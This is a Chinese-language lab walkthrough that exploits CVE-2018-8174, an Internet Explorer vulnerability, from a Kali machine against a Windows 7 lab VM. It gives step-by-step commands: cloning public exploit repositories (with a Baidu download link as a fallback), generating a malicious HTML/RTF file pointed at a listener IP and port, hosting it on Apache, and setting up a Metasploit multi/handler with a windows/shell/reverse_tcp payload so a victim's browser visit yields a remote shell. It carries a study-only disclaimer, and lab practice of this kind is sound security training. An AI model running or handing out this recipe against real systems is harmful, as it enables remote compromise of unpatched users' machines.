目录
利用 0DAY 漏洞 CVE-2018-8174 获取 shell
(2)、用python2生成恶意 html 文件到网站根目录,并启动 apache2 服务
(3)、新打开一个终端 CTRL+SHIFT+T,生成 MSF 监听
Metasploitable2-linux:靶机 192.168.234.8
kali-debian:攻击机 192.168.234.141
win7 虚拟机:靶机 192.168.234.158
在此声明文章仅供相互学习参考,严禁利用于违法犯忌,任何事故自行承担!!
利用 0DAY 漏洞 CVE-2018-8174 获取 shell
——利用0DAY漏洞(IE浏览器的漏洞)可以向页面注入libs脚本,可以写libs木马脚本注入进去,进行木马攻击,类似于XSS
总结:
(1)、git clone安装 CVE-2018-8174的EXP到kali
(2)、用python2、EXP生成恶意 html 文件到网站根目录,并启动 apache2 服务
(3)、新打开一个终端 CTRL+SHIFT+T,生成 MSF 监听
—— 利用exploit/multi/handler模块,设置payloads为windows/shell/reverse_tcp
(1)、安装 CVE-2018-8174_EXP
root@zwzj:~# git clone https://github.com/iBearcat/CVE-2018-8174_EXP.git 或
git clone https://github.com/Yt1g3r/CVE-2018-8174_ExP.git
————从 github 上克隆 CVE-2018-8174 的 EXP 到 Kali
若无法下载或者没有资源、无法访问,可直接在百度网盘接收文件
链接:https://pan.baidu.com/s/1CAD51uknvQbkEUVo1Hm3vA?pwd=wcpv
提取码:wcpv
(2)、用python2生成恶意 html 文件到网站根目录,并启动 apache2 服务
root@zwzj:~# cd CVE-2018-8174_EXP-master/
root@zwzj:~/CVE-2018-8174_EXP-master# ls
CVE-2018-8174.py README.md
root@zwzj:~/CVE-2018-8174_EXP-master# python2 CVE-2018-8174.py -u http://192.168.234.141/exploit.html -o hack.rtf -i 192.168.234.141 -p 4444
————注意与要用python2执行,语法有不同
参数说明:
-u:URL 地址,恶意 html 文件 hack.html 的访问地址
-o:生成文档
-i:监听地址
-p:监听端口
恶意 html 文件生成成功:
root@zwzj:~/CVE-2018-8174_EXP# cp exploit.html /var/www/html/
————将恶意 html 文件移动到网站根目录
root@zwzj:~/CVE-2018-8174_EXP# service apache2 start ——启动 apache2 服务
(3)、新打开一个终端 CTRL+SHIFT+T,生成 MSF 监听
root@zwzj:~# msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.234.141
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit
进入 win7靶机,打开浏览器,访问恶意http://192.168.234.141/exploit.html
——靶机点击恶意链接
返回 kali 查看已经建立会话,攻击获取shell成功